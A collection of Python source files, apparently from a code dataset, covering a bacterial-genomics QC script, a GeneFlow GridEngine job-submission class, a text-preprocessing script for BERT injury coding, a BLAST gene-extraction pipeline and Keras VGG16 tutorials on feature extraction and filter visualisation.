run_info = db.runs.find_one({"run": new_sample_dict["Run_ID"]})
if run_info and "sequencer" in run_info.keys():
new_sample_dict["sequencer"] = run_info["sequencer"]
if (
"mash" in new_sample_dict.keys()
and "Notes" in new_sample_dict["mash"].keys()
):
if (
run_info["mash"]["Notes"]
== "No_hit_above_threshold_from_reference_collection_Reporting_top_refseq_hit"
):
new_sample_dict["species_flagged"] = True
else:
new_sample_dict["species_flagged"] = False
if "cleanData" in new_sample_dict.keys():
if "Mean_Coverage_raw" in new_sample_dict["cleanData"].keys():
if new_sample_dict["cleanData"]["Mean_Coverage_raw"] < 25:
new_sample_dict["assembly_flagged"] = True
new_sample_dict["QC_flagged"] = True
else:
new_sample_dict["assembly_flagged"] = False
if (
"HalfCov_Percent" in new_sample_dict["cleanData"].keys()
or "Discarded_Percent" in new_sample_dict["cleanData"].keys()
):
if (
new_sample_dict["cleanData"]["HalfCov_Percent"] > 1
or new_sample_dict["cleanData"]["Discarded_Percent"] > 5
):
new_sample_dict["sequence_flagged"] = True
new_sample_dict["QC_flagged"] = True
else:
new_sample_dict["sequence_flagged"] = False
return new_sample_dict
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# database
parser.add_argument(
"-d", "--db_host", action="store", default="bmgap-poc.biotech.cdc.gov"
)
# identifier
parser.add_argument("-i", "--identifier", action="store", required=True)
args = vars(parser.parse_args())
client = pymongo.MongoClient(
args["db_host"],
27017,
username="bmgap-writer",
password="<PASSWORD>",
authSource="BMGAP",
)
db = client.BMGAP
main(db, args["identifier"])
``` |
{
"source": "82ndAirborneDiv/geneflow2",
"score": 3
} |
#### File: geneflow/extend/gridengine_step.py
```python
import drmaa
import os
from slugify import slugify
import shutil
from geneflow.log import Log
from geneflow.workflow_step import WorkflowStep
from geneflow.data_manager import DataManager
from geneflow.uri_parser import URIParser
class GridengineStep(WorkflowStep):
"""
A class that represents GridEngine Workflow Step objects.
Inherits from the "WorkflowStep" class.
"""
def __init__(
self,
job,
step,
app,
inputs,
parameters,
config,
depend_uris,
data_uris,
source_context,
clean=False,
gridengine={}
):
"""
Instantiate GridEngineStep class by calling the super class constructor.
See documentation for WorkflowStep __init__().
"""
super(GridengineStep, self).__init__(
job,
step,
app,
inputs,
parameters,
config,
depend_uris,
data_uris,
source_context,
clean
)
# gridengine context data
self._gridengine = gridengine
self._job_status_map = {
drmaa.JobState.UNDETERMINED: 'UNKNOWN',
drmaa.JobState.QUEUED_ACTIVE: 'PENDING',
drmaa.JobState.SYSTEM_ON_HOLD: 'PENDING',
drmaa.JobState.USER_ON_HOLD: 'PENDING',
drmaa.JobState.USER_SYSTEM_ON_HOLD: 'PENDING',
drmaa.JobState.RUNNING: 'RUNNING',
drmaa.JobState.SYSTEM_SUSPENDED: 'RUNNING',
drmaa.JobState.USER_SUSPENDED: 'RUNNING',
drmaa.JobState.DONE: 'FINISHED',
drmaa.JobState.FAILED: 'FAILED'
}
def initialize(self):
"""
Initialize the GridEngineStep class.
Validate that the step context is appropriate for this "gridengine" context.
And that the app contains a "gridengine" definition.
Args:
self: class instance.
Returns:
On success: True.
On failure: False.
"""
# make sure the step context is local
if self._step['execution']['context'] != 'gridengine':
msg = (
'"gridengine" step class can only be instantiated with a'
' step definition that has a "gridengine" execution context'
)
Log.an().error(msg)
return self._fatal(msg)
# make sure app has a local implementation
# local def can be used by gridengine because it just needs a shell script
if 'local' not in self._app['implementation']:
msg = (
'"gridengine" step class can only be instantiated with an app that'
' has a "local" implementation'
)
Log.an().error(msg)
return self._fatal(msg)
if not super(GridengineStep, self).initialize():
msg = 'cannot initialize workflow step'
Log.an().error(msg)
return self._fatal(msg)
return True
def _init_data_uri(self):
"""
Create output data URI for the source context (local).
Args:
self: class instance.
Returns:
On success: True.
On failure: False.
"""
# make sure the source data URI has a compatible scheme (local)
if self._parsed_data_uris[self._source_context]['scheme'] != 'local':
msg = 'invalid data uri scheme for this step: {}'.format(
self._parsed_data_uris[self._source_context]['scheme']
)
Log.an().error(msg)
return self._fatal(msg)
# delete old folder if it exists and clean==True
if (
DataManager.exists(
parsed_uri=self._parsed_data_uris[self._source_context]
)
and self._clean
):
if not DataManager.delete(
parsed_uri=self._parsed_data_uris[self._source_context]
):
Log.a().warning(
'cannot delete existing data uri: %s',
self._parsed_data_uris[self._source_context]['chopped_uri']
)
# create folder
if not DataManager.mkdir(
parsed_uri=self._parsed_data_uris[self._source_context],
recursive=True
):
msg = 'cannot create data uri: {}'.format(
self._parsed_data_uris[self._source_context]['chopped_uri']
)
Log.an().error(msg)
return self._fatal(msg)
# create _log folder
if not DataManager.mkdir(
uri='{}/_log'.format(
self._parsed_data_uris[self._source_context]['chopped_uri']
),
recursive=True
):
msg = 'cannot create _log folder in data uri: {}/_log'.format(
self._parsed_data_uris[self._source_context]['chopped_uri']
)
Log.an().error(msg)
return self._fatal(msg)
return True
def _get_map_uri_list(self):
"""
Get the contents of the map URI (local URI).
Args:
self: class instance.
Returns:
Array of base file names in the map URI. Returns False on
exception.
"""
# make sure map URI is compatible scheme (local)
if self._parsed_map_uri['scheme'] != 'local':
msg = 'invalid map uri scheme for this step: {}'.format(
self._parsed_map_uri['scheme']
)
Log.an().error(msg)
return self._fatal(msg)
# get file list from URI
file_list = DataManager.list(parsed_uri=self._parsed_map_uri)
if file_list is False:
msg = 'cannot get contents of map uri: {}'\
.format(self._parsed_map_uri['chopped_uri'])
Log.an().error(msg)
return self._fatal(msg)
return file_list
def _run_map(self, map_item):
"""
Run a job for each map item and store the job ID.
Args:
self: class instance.
map_item: map item object (item of self._map).
Returns:
On success: True.
On failure: False.
"""
# load default app inputs, overwrite with template inputs
inputs = {}
for input_key in self._app['inputs']:
if input_key in map_item['template']:
inputs[input_key] = map_item['template'][input_key]
else:
if self._app['inputs'][input_key]['default']:
inputs[input_key] = self._app['inputs'][input_key]['default']
# load default app parameters, overwrite with template parameters
parameters = {}
for param_key in self._app['parameters']:
if param_key in map_item['template']:
parameters[param_key] = map_item['template'][param_key]
else:
if self._app['parameters'][param_key]['default'] not in [None, '']:
parameters[param_key] \
= self._app['parameters'][param_key]['default']
# get full path of wrapper script
path = shutil.which(self._app['implementation']['local']['script'])
if not path:
msg = 'wrapper script not found in path: %s'.format(
self._app['implementation']['local']['script']
)
Log.an().error(msg)
return self._fatal(msg)
# construct argument list for wrapper script
args = [path]
for input_key in inputs:
if inputs[input_key]:
args.append('--{}={}'.format(
input_key,
URIParser.parse(inputs[input_key])['chopped_path']
))
for param_key in parameters:
if param_key == 'output':
args.append('--output={}/{}'.format(
self._parsed_data_uris[self._source_context]\
['chopped_path'],
parameters['output']
))
else:
args.append('--{}={}'.format(
param_key, parameters[param_key]
))
# add exeuction method
args.append('--exec_method={}'.format(self._step['execution']['method']))
# specify execution init commands if 'init' param given
if 'init' in self._step['execution']['parameters']:
args.append('--exec_init={}'.format(self._step['execution']['parameters']['init']))
Log.a().debug(
'[step.%s]: command: %s -> %s',
self._step['name'],
map_item['template']['output'],
' '.join(args)
)
# construct job name
name = 'gf-{}-{}-{}'.format(
map_item['attempt'],
slugify(self._step['name'], regex_pattern=r'[^-a-z0-9_]+'),
slugify(map_item['template']['output'], regex_pattern=r'[^-a-z0-9_]+')
)
# construct paths for logging stdout and stderr
log_path = '{}/_log/{}'.format(
self._parsed_data_uris[self._source_context]['chopped_path'],
name
)
# create and populate job template
jt = self._gridengine['drmaa_session'].createJobTemplate()
jt.remoteCommand = '/bin/bash'
jt.args = args
jt.jobName = name
jt.errorPath = ':{}.err'.format(log_path)
jt.outputPath = ':{}.out'.format(log_path)
# pass execution parameters to job template
native_spec = ''
if 'queue' in self._step['execution']['parameters']:
native_spec += ' -q {}'.format(
self._step['execution']['parameters']['queue']
)
if 'slots' in self._step['execution']['parameters']:
native_spec += ' -pe smp {}'.format(
self._step['execution']['parameters']['slots']
)
if 'other' in self._step['execution']['parameters']:
native_spec += ' {}'.format(
self._step['execution']['parameters']['other']
)
jt.nativeSpecification = native_spec
# submit hpc job using drmaa library
job_id = self._gridengine['drmaa_session'].runJob(jt)
self._gridengine['drmaa_session'].deleteJobTemplate(jt)
Log.a().debug(
'[step.%s]: hpc job id: %s -> %s',
self._step['name'],
map_item['template']['output'],
job_id
)
# record job info
map_item['run'][map_item['attempt']]['hpc_job_id'] = job_id
# set status of process
map_item['status'] = 'PENDING'
map_item['run'][map_item['attempt']]['status'] = 'PENDING'
return True
def run(self):
"""
Execute shell scripts for each of the map items.
Then store PIDs in run detail.
Args:
self: class instance.
Returns:
On success: True.
On failure: False.
"""
for map_item in self._map:
if not self._run_map(map_item):
msg = 'cannot run script for map item "{}"'\
.format(map_item['filename'])
Log.an().error(msg)
return self._fatal(msg)
self._update_status_db('RUNNING', '')
return True
def _serialize_detail(self):
"""
Serialize map-reduce items.
But leave out non-serializable Popen proc item, keep pid.
Args:
self: class instance.
Returns:
A dict of all map items and their run histories.
"""
return self._map
def check_running_jobs(self):
"""
Check the status/progress of all map-reduce items and update _map status.
Args:
self: class instance.
Returns:
True.
"""
# check if jobs are running, finished, or failed
for map_item in self._map:
if map_item['status'] != 'FINISHED' and map_item['status'] != 'FAILED':
# can only get job status if it has not already been disposed with "wait"
status = self._gridengine['drmaa_session'].jobStatus(
map_item['run'][map_item['attempt']]['hpc_job_id']
)
map_item['status'] = self._job_status_map[status]
if map_item['status'] == 'FINISHED' or map_item['status'] == 'FAILED':
# check exit status
job_info = self._gridengine['drmaa_session'].wait(
map_item['run'][map_item['attempt']]['hpc_job_id'],
self._gridengine['drmaa_session'].TIMEOUT_NO_WAIT
)
Log.a().debug(
'[step.%s]: exit status: %s -> %s',
self._step['name'],
map_item['template']['output'],
job_info.exitStatus
)
if job_info.exitStatus > 0:
# job actually failed
map_item['status'] = 'FAILED'
map_item['run'][map_item['attempt']]['status'] = map_item['status']
if map_item['status'] == 'FAILED' and map_item['attempt'] < 5:
# retry job if not at limit
if not self.retry_failed(map_item):
Log.a().warning(
'[step.%s]: cannot retry failed gridengine job (%s)',
self._step['name'],
map_item['template']['output']
)
self._update_status_db(self._status, '')
return True
def retry_failed(self, map_item):
"""
Retry a job.
Args:
self: class instance.
Returns:
True if failed/stopped job restarted successfully
False if failed/stopped job not restarted due to error
"""
# retry job
Log.some().info(
'[step.%s]: retrying gridengine job (%s), attempt number %s',
self._step['name'],
map_item['template']['output'],
map_item['attempt']+1
)
# add another run to list
map_item['attempt'] += 1
map_item['run'].append({})
if not self._run_map(map_item):
Log.a().warning(
'[step.%s]: cannot retry gridengine job (%s), attempt number %s',
self._step['name'],
map_item['template']['output'],
map_item['attempt']
)
return False
return True
``` |
{
"source": "82ndAirborneDiv/injury-autocoding",
"score": 3
} |
#### File: injury-autocoding/src/preprocessing.py
```python
import argparse
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from tools.text import clean_text
def parse_arguments(parser):
parser.add_argument('--data_dir', type=str, default='C:/data/niosh_ifund/')
parser.add_argument('--test_file', type=str, default='test.csv')
parser.add_argument('--train_file', type=str, default='train.csv')
args = parser.parse_args()
return args
if __name__ == '__main__':
parser = argparse.ArgumentParser()
args = parse_arguments(parser)
# Importing the raw data
train = pd.read_csv(args.data_dir + args.train_file,
usecols=['text', 'event'])
test = pd.read_csv(args.data_dir + args.test_file,
usecols=['text'])
# Adding a random identifier for the BERT scripts
num_train = train.shape[0]
num_test = test.shape[0]
num_records = num_train + num_test
ids = np.array([''.join(['record', str(num)])
for num in list(range(num_records))])
np.random.shuffle(ids)
train['id'] = ids[0:num_train]
test['id'] = ids[num_train:]
# Lowercasing and adding spaces around common abbreviations;
# only fixes a few things
train.text = pd.Series(clean_text(train.text))
test.text = pd.Series(clean_text(test.text))
# Clipping the docs to the max length
train_lengths = np.array([len(doc.split()) for doc in
pd.concat([train.text, test.text])])
test_lengths = np.array([len(doc.split()) for doc in
pd.concat([train.text, test.text])])
clip_to = np.min([np.max(train_lengths), np.max(test_lengths)])
train.text = pd.Series([' '.join(doc.split()[:clip_to])
for doc in train.text])
test.text = pd.Series([' '.join(doc.split()[:clip_to])
for doc in test.text])
pd.Series(clip_to).to_csv(args.data_dir + 'clip_to.csv',
header=False, index=False)
# Making a lookup dictionary for the event codes
code_df = pd.read_csv(args.data_dir + 'code_descriptions.csv')
codes = code_df.event.values
code_dict = dict(zip(codes, np.arange(len(codes))))
train.event = [code_dict[code] for code in train.event]
# Saving the code dict to disk
code_df = pd.DataFrame.from_dict(code_dict, orient='index')
code_df['event_code'] = code_df.index
code_df.columns = ['value', 'event_code']
code_df.to_csv(args.data_dir + 'code_dict.csv', index=False)
# Rearranging the columns for BERT
train['filler'] = np.repeat('a', train.shape[0])
test['filler'] = np.repeat('a', test.shape[0])
train = train[['id', 'event', 'filler', 'text']]
test = test[['id', 'text']]
# Shuffling the rows
train = train.sample(frac=1)
# Writing the regular splits to disk
train.to_csv(args.data_dir + 'train.tsv', sep='\t',
index=False, header=False)
test.to_csv(args.data_dir + 'test.tsv', sep='\t',
index=False, header=True)
``` |
{
"source": "82ndAirborneDiv/LpSubP",
"score": 2
} |
#### File: 82ndAirborneDiv/LpSubP/getsequences.py
```python
import os
import subprocess
import sys
script=sys.argv[0]
base_dir=sys.argv[1]+"/prod_fasta/"
coregenome_dir=sys.argv[1]+"../coregene/"
os.chdir(base_dir)
def MakeBlastDB():
os.system("mkdir output")
for genome in os.listdir('.'):
genome=os.path.join(base_dir,genome)
base=os.path.basename(genome)
basename=base.split(".")[0]
subprocess.call(["makeblastdb","-in",genome,"-dbtype","nucl","-out","./output"+"/"+basename])
MakeBlastDB()
child_processes=[]
def RunBlast():
os.system("mkdir blastoutput")
for query in os.listdir(coregenome_dir):
if query.endswith(".fasta"):
query=os.path.join(coregenome_dir,query)
baseq=os.path.basename(query)
filename =os.path.splitext(baseq)[0]
for database in os.listdir(base_dir+"/output"):
database=os.path.join(base_dir+"/output",database)
basedb=os.path.basename(database)
print(basedb)
dbname=basedb.split(".")[0]
databasename =os.path.join(base_dir+"/output",basedb.split(".")[0])
p=subprocess.Popen(["blastn","-query",query,"-db",databasename,"-outfmt","6 qseqid sseqid pident qlen qstart qend sstart send","-out","./blastoutput"+"/"+filename+"_"+dbname+".blast"])
child_processes.append(p)
for cp in child_processes:
cp.wait()
RunBlast()
print("blast is done")
os.chdir(base_dir+"/blastoutput")
def filter():
os.system("mkdir sorted_blast_pair")
for blastresult in os.listdir('.'):
if blastresult.endswith(".blast"):
genomename=os.path.basename(blastresult)
blastresult=open(blastresult)
for line in blastresult:
try:
gene={}
line = line.split( )
qseqid=line[0]
sseqid=line[1]
pident=float(line[2])
qlength=float(line[3])
qstart=float(line[4])
qend=float(line[5])
sstart=float(line[6])
sstart=float(line[6])
send=float(line[7])
if (pident>85) & (((qend-qstart+1)/qlength)>0.75) :
gene[qseqid]=sseqid
for key in gene:
with open("./sorted_blast_pair"+"/"+key+"_"+genomename+".pair","w") as ofile:
ofile.write(key+"\t"+gene.get(key))
ofile.close
except IOError:
print("no input")
blastresult.close()
filter()
print("Filtering blast result is done")
####GetSequence#####
os.chdir(base_dir)
os.system("mkdir seqrecords")
def Parse(filename,seqs):
file = open(filename)
seqs={}
name = ''
for line in file:
line = line.rstrip()
if line.startswith('>'):
name=line.replace('>',"")
seqs[name] = ''
else:
seqs[name] = seqs[name] + line
file.close
return seqs
seqs={}
for genome in os.listdir('.'):
if genome.endswith(".fasta"):
seqs=dict(seqs,**Parse(genome,seqs))
for file in os.listdir(base_dir+'/blastoutput/sorted_blast_pair'):
genomename=file.split("_")[2]
file=open(os.path.join(base_dir+'/blastoutput/sorted_blast_pair',file))
for line in file:
genename=line.split("\t")[1]+" "
coregenename=line.split("\t")[0]
for key in seqs:
if key.find(str(genename))!= -1:
with open("./seqrecords"+"/"+coregenename+"_"+genename+"_"+genomename+".fasta","w") as ofile:
ofile.write(">"+coregenename+"_"+genename+"_"+genomename+"\n"+seqs.get(key))
ofile.close()
file.close()
print("Getting sequences are done")
os.chdir(base_dir+'/seqrecords')
os.system('mkdir pergene_seqrecords')
genelist=open(os.path.join(sys.argv[1]+"../",'new_49gene.list'))
for gene in genelist:
gene=gene.rstrip()
for seqrecord in os.listdir("."):
if seqrecord.startswith(gene):
seq=open(os.path.join(base_dir+'/seqrecords',seqrecord))
for seqline in seq:
seqline=seqline.rstrip()
with open("./pergene_seqrecords"+"/"+gene+"_"+"unaligned"+".fasta","a") as pfile:
pfile.write(seqline+"\n")
pfile.close
seq.close()
genelist.close()
print("Sequences are sorted by each locus")
#####PRESENCE/ABSENCE#####
os.chdir(base_dir)
filelist1=os.listdir(base_dir+"/blastoutput")
filelist2=os.listdir(base_dir+"/blastoutput/sorted_blast_pair")
sys.stdout=open('test','a')
for beforefile in filelist1:
if beforefile.endswith(".blast"):
base=beforefile.split(".")[0]
coregenename=base.split("_")[0]
genomename=base.split("_")[1]
if str(filelist2).find(str(beforefile))!= -1:
sys.stdout.write(coregenename+"\t"+genomename+"\t"+"yes"+"\n")
else:
sys.stdout.write(coregenename+"\t"+genomename+"\t"+"no"+"\n")
sys.stdout.close()
test=open("test")
no=open("notest",'a')
for line in test:
line=line.rstrip()
core=line.split()[0]
subject=line.split()[1]
if (line.startswith("lpg")) & (line.find("no")!= -1):
for blastresult in filelist1:
if blastresult.startswith(core+"_"+subject):
f=open(os.path.join(base_dir+"/blastoutput",blastresult))
no.write(line+"\t"+str(f.readlines()).replace("t","").replace("n","")+"\n")
no.close()
``` |
{
"source": "83286415/DeepLearningWithPythonKeras",
"score": 3
} |
#### File: 83286415/DeepLearningWithPythonKeras/5.3.1-using-a-pretrained-convnet-with-feature-extraction.py
```python
import keras
print(keras.__version__) # 2.2.4
from keras.applications import VGG16
# pre-trained network
conv_base = VGG16(weights='imagenet',
include_top=False, # no Dense layer included
input_shape=(150, 150, 3))
print(conv_base.summary())
'''
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
input_1 (InputLayer) (None, 150, 150, 3) 0
_________________________________________________________________
block1_conv1 (Conv2D) (None, 150, 150, 64) 1792
_________________________________________________________________
block1_conv2 (Conv2D) (None, 150, 150, 64) 36928
_________________________________________________________________
block1_pool (MaxPooling2D) (None, 75, 75, 64) 0
_________________________________________________________________
block2_conv1 (Conv2D) (None, 75, 75, 128) 73856
_________________________________________________________________
block2_conv2 (Conv2D) (None, 75, 75, 128) 147584
_________________________________________________________________
block2_pool (MaxPooling2D) (None, 37, 37, 128) 0
_________________________________________________________________
block3_conv1 (Conv2D) (None, 37, 37, 256) 295168
_________________________________________________________________
block3_conv2 (Conv2D) (None, 37, 37, 256) 590080
_________________________________________________________________
block3_conv3 (Conv2D) (None, 37, 37, 256) 590080
_________________________________________________________________
block3_pool (MaxPooling2D) (None, 18, 18, 256) 0
_________________________________________________________________
block4_conv1 (Conv2D) (None, 18, 18, 512) 1180160
_________________________________________________________________
block4_conv2 (Conv2D) (None, 18, 18, 512) 2359808
_________________________________________________________________
block4_conv3 (Conv2D) (None, 18, 18, 512) 2359808
_________________________________________________________________
block4_pool (MaxPooling2D) (None, 9, 9, 512) 0
_________________________________________________________________
block5_conv1 (Conv2D) (None, 9, 9, 512) 2359808
_________________________________________________________________
block5_conv2 (Conv2D) (None, 9, 9, 512) 2359808
_________________________________________________________________
block5_conv3 (Conv2D) (None, 9, 9, 512) 2359808
_________________________________________________________________
block5_pool (MaxPooling2D) (None, 4, 4, 512) 0
=================================================================
Total params: 14,714,688
Trainable params: 14,714,688
Non-trainable params: 0
_________________________________________________________________
'''
# 5.3.1.1 feature extraction without data augmentation
import os
import numpy as np
from keras.preprocessing.image import ImageDataGenerator
base_dir = 'D:/AI/deep-learning-with-python-notebooks-master/cats_and_dogs_small'
train_dir = os.path.join(base_dir, 'train')
validation_dir = os.path.join(base_dir, 'validation')
test_dir = os.path.join(base_dir, 'test')
datagen = ImageDataGenerator(rescale=1./255)
# All images will be rescaled by 1./255 (the max pixel value is 255. here its max is 1)
batch_size = 20
def extract_features(directory, sample_count):
features = np.zeros(shape=(sample_count, 4, 4, 512)) # make zero matrix for features extracted below
labels = np.zeros(shape=(sample_count))
generator = datagen.flow_from_directory(
directory,
target_size=(150, 150),
batch_size=batch_size, # 20, defined outside this def
class_mode='binary')
i = 0
for inputs_batch, labels_batch in generator: # loops in images dir and never stops, so need a break below
features_batch = conv_base.predict(inputs_batch)
features[i * batch_size : (i + 1) * batch_size] = features_batch # map the feature's map to features matrix
labels[i * batch_size : (i + 1) * batch_size] = labels_batch
i += 1
if i * batch_size >= sample_count: # the sample images count in dirs
# Note that since generators yield data indefinitely in a loop,
# we must `break` after every image has been seen once.
break
return features, labels
train_features, train_labels = extract_features(train_dir, 2000)
validation_features, validation_labels = extract_features(validation_dir, 1000)
test_features, test_labels = extract_features(test_dir, 1000)
# Dense layer needs 3D -> 1D, so reshape feature matrix to (sample_count, 8129), and this 8129=4*4*512
train_features = np.reshape(train_features, (2000, 4 * 4 * 512)) # 4, 4, 512: the last MaxPooling2D layer output
validation_features = np.reshape(validation_features, (1000, 4 * 4 * 512))
test_features = np.reshape(test_features, (1000, 4 * 4 * 512))
# build network with pre-trained network
from keras import models
from keras import layers
from keras import optimizers
model = models.Sequential()
model.add(layers.Dense(256, activation='relu', input_dim=4 * 4 * 512))
model.add(layers.Dropout(0.5))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer=optimizers.RMSprop(lr=2e-5),
loss='binary_crossentropy',
metrics=['acc'])
history = model.fit(train_features, train_labels,
epochs=30,
batch_size=20,
validation_data=(validation_features, validation_labels))
# plot
import matplotlib.pyplot as plt
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
# plt.show() # commented it out for running code below
print('5.3.1.1 done')
print('---------------------------------------------------------------------------------------------------------------')
# 5.3.1.2 feature extraction with data augmentation
# if no GPU supports, do not try this way
model = models.Sequential()
model.add(conv_base) # add pre-trained network model into this model
model.add(layers.Flatten())
model.add(layers.Dense(256, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
print(model.summary())
'''
Layer (type) Output Shape Param #
=================================================================
vgg16 (Model) (None, 4, 4, 512) 14714688
_________________________________________________________________
flatten_1 (Flatten) (None, 8192) 0
_________________________________________________________________
dense_3 (Dense) (None, 256) 2097408
_________________________________________________________________
dense_4 (Dense) (None, 1) 257
=================================================================
Total params: 16,812,353
Trainable params: 16,812,353
Non-trainable params: 0
_________________________________________________________________
'''
# freezing con_base's weights
print('This is the number of trainable weights '
'before freezing the conv base:', len(model.trainable_weights)) # output: 30
conv_base.trainable = False # then compile the model make this modification work
print('This is the number of trainable weights '
'after freezing the conv base:', len(model.trainable_weights)) # output: 4
# make train data generator (only) with data augmentation
train_datagen = ImageDataGenerator(
rescale=1./255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode='nearest')
# Note that the validation data should not be augmented!
test_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
# This is the target directory
train_dir,
# All images will be resized to 150x150
target_size=(150, 150),
batch_size=20,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode='binary')
model.compile(loss='binary_crossentropy',
optimizer=optimizers.RMSprop(lr=2e-5),
metrics=['acc'])
history = model.fit_generator(
train_generator,
steps_per_epoch=100,
epochs=30,
validation_data=validation_generator,
validation_steps=50,
verbose=2)
model.save('cats_and_dogs_small_3_feature_extraction_with_data_augmentation.h5')
# plot
acc = history.history['acc']
val_acc = history.history['val_acc']
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(acc))
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy_2')
plt.legend()
plt.figure()
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss_2')
plt.legend()
plt.show()
'''it costs 8 hours to run this model fit
Epoch 1/30
- 814s - loss: 0.5846 - acc: 0.7055 - val_loss: 0.4523 - val_acc: 0.8140
Epoch 2/30
- 844s - loss: 0.4821 - acc: 0.7785 - val_loss: 0.3697 - val_acc: 0.8550
Epoch 3/30
- 882s - loss: 0.4210 - acc: 0.8185 - val_loss: 0.3524 - val_acc: 0.8580
Epoch 4/30
- 914s - loss: 0.3949 - acc: 0.8325 - val_loss: 0.3277 - val_acc: 0.8530
Epoch 5/30
- 878s - loss: 0.3815 - acc: 0.8355 - val_loss: 0.2894 - val_acc: 0.8850
Epoch 6/30
- 865s - loss: 0.3618 - acc: 0.8390 - val_loss: 0.2870 - val_acc: 0.8900
Epoch 7/30
- 863s - loss: 0.3670 - acc: 0.8340 - val_loss: 0.2894 - val_acc: 0.8760
Epoch 8/30
- 937s - loss: 0.3493 - acc: 0.8455 - val_loss: 0.2716 - val_acc: 0.8980
Epoch 9/30
- 879s - loss: 0.3399 - acc: 0.8515 - val_loss: 0.2646 - val_acc: 0.8980
Epoch 10/30
- 895s - loss: 0.3327 - acc: 0.8545 - val_loss: 0.2598 - val_acc: 0.8960
Epoch 11/30
- 854s - loss: 0.3266 - acc: 0.8540 - val_loss: 0.2555 - val_acc: 0.9020
Epoch 12/30
- 856s - loss: 0.3341 - acc: 0.8510 - val_loss: 0.2535 - val_acc: 0.8980
Epoch 13/30
- 854s - loss: 0.3189 - acc: 0.8600 - val_loss: 0.2554 - val_acc: 0.8970
Epoch 14/30
- 849s - loss: 0.3167 - acc: 0.8620 - val_loss: 0.2493 - val_acc: 0.9020
Epoch 15/30
- 839s - loss: 0.3256 - acc: 0.8490 - val_loss: 0.2465 - val_acc: 0.9010
Epoch 16/30
- 840s - loss: 0.3118 - acc: 0.8645 - val_loss: 0.2456 - val_acc: 0.9040
Epoch 17/30
- 841s - loss: 0.3114 - acc: 0.8635 - val_loss: 0.2464 - val_acc: 0.9030
Epoch 18/30
- 841s - loss: 0.3045 - acc: 0.8690 - val_loss: 0.2478 - val_acc: 0.9010
Epoch 19/30
- 845s - loss: 0.3112 - acc: 0.8605 - val_loss: 0.2468 - val_acc: 0.8990
Epoch 20/30
- 843s - loss: 0.2951 - acc: 0.8735 - val_loss: 0.2412 - val_acc: 0.9030
Epoch 21/30
- 840s - loss: 0.3061 - acc: 0.8715 - val_loss: 0.2403 - val_acc: 0.9060
Epoch 22/30
- 866s - loss: 0.2909 - acc: 0.8750 - val_loss: 0.2405 - val_acc: 0.9050
Epoch 23/30
- 912s - loss: 0.2976 - acc: 0.8690 - val_loss: 0.2448 - val_acc: 0.9030
Epoch 24/30
- 838s - loss: 0.3001 - acc: 0.8730 - val_loss: 0.2451 - val_acc: 0.8990
Epoch 25/30
- 833s - loss: 0.2876 - acc: 0.8720 - val_loss: 0.2382 - val_acc: 0.9030
Epoch 26/30
- 845s - loss: 0.2913 - acc: 0.8775 - val_loss: 0.2415 - val_acc: 0.9020
Epoch 27/30
- 915s - loss: 0.2986 - acc: 0.8725 - val_loss: 0.2370 - val_acc: 0.9060
Epoch 28/30
- 968s - loss: 0.2830 - acc: 0.8735 - val_loss: 0.2423 - val_acc: 0.9000
Epoch 29/30
- 1004s - loss: 0.2853 - acc: 0.8840 - val_loss: 0.2483 - val_acc: 0.9020
Epoch 30/30
- 1046s - loss: 0.2865 - acc: 0.8770 - val_loss: 0.2416 - val_acc: 0.9030
'''
print('5.3.1.2 done')
print('---------------------------------------------------------------------------------------------------------------')
```
#### File: 83286415/DeepLearningWithPythonKeras/5.4.2-visualizing-convnets-filters.py
```python
import keras
print(keras.__version__) # 2.2.4
from keras.applications import VGG16 # import the network model trained
from keras import backend as K # backend: tensorflow. refer to https://keras.io/zh/backend/#keras
# show one filter's visualization
model = VGG16(weights='imagenet',
include_top=False) # no Dense layer included
layer_name = 'block3_conv1'
filter_index = 0
layer_output = model.get_layer(layer_name).output # Tensor("block3_conv1/Relu:0", shape=(?, ?, ?, 256), dtype=float32)
loss = K.mean(layer_output[:, :, :, filter_index]) # return the tensor of the first filter's mean, a int
# loss: Tensor("Mean:0", shape=(), dtype=float32)
# K.mean is the tensorflow.reduce_mean(); refer to https://www.cnblogs.com/yuzhuwei/p/6986171.html
# The call to `gradients` returns a list of tensors (of size 1 in this case)
# hence we only keep the first element -- which is a tensor.
grads = K.gradients(loss, model.input)[0] # refer to tf.gradients()
# We add 1e-5 before dividing so as to avoid accidentally dividing by 0.
grads /= (K.sqrt(K.mean(K.square(grads))) + 1e-5)
iterate = K.function([model.input], [loss, grads]) # make iterate a instance with input and output scheduled
# refer to book P137
# Let's test it:
import numpy as np
loss_value, grads_value = iterate([np.zeros((1, 150, 150, 3))])
def deprocess_image(x):
# normalize tensor: center on 0., ensure std is 0.1
x -= x.mean()
x /= (x.std() + 1e-5)
x *= 0.1
# clip to [0, 1]
x += 0.5
x = np.clip(x, 0, 1)
# convert to RGB array
x *= 255
x = np.clip(x, 0, 255).astype('uint8')
return x # x is in [0, 255]
# put all pieces above into one function
def generate_pattern(layer_name, filter_index, size=150):
# Build a loss function that maximizes the activation
# of the nth filter of the layer considered.
layer_output = model.get_layer(layer_name).output
loss = K.mean(layer_output[:, :, :, filter_index])
# Compute the gradient of the input picture wrt this loss
grads = K.gradients(loss, model.input)[0]
